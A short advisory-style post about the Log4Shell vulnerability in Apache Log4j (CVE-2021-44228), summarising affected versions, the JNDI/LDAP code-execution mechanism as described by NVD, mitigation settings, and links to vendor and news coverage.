Vulnerability found in the Java Library, Log4j could lead to a breach.
December 9th, a vulnerability with the Log4J Java Library was published, along with proof-of-concept exploit code. It has since been given the designation CVE-2021-44228, and is nicknamed "Log4Shell"
The vulnerability affects unpatched versions of the Log4j from 2.0-beta9 to 2.15.
"Apache Log4j 2 JNDI features are used in configuration, log messages and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints," nvd.nist.gov states.
According to nvd.nist.gov, a hacker can gain control of those log messages or log parameters to then execute a code loaded from LDAP servers when message lookup substitution is enabled. Older versions (>2.10) can mitigate this by setting the system property "log4j2.formatMsgNoLookups" to "True", or by removing the JndiLookup class from the classpath.
Detection of Log4Shell (CVE-2021-44228) using QRadar (ibm.com)
An update on the Apache Log4j CVE-2021-44228 vulnerability - IBM PSIRT Blog
Log4j2 Vulnerability: How to Mitigate CVE-2021-44228 | CrowdStrike
Companies Respond to Log4Shell Vulnerability as Attacks Rise | SecurityWeek.Com
The Log4j security flaw could impact the entire internet. Here's what you should know - CNN
"Log4Shell": The Latest News, Updates, & Prevention Tips | CrowdStrike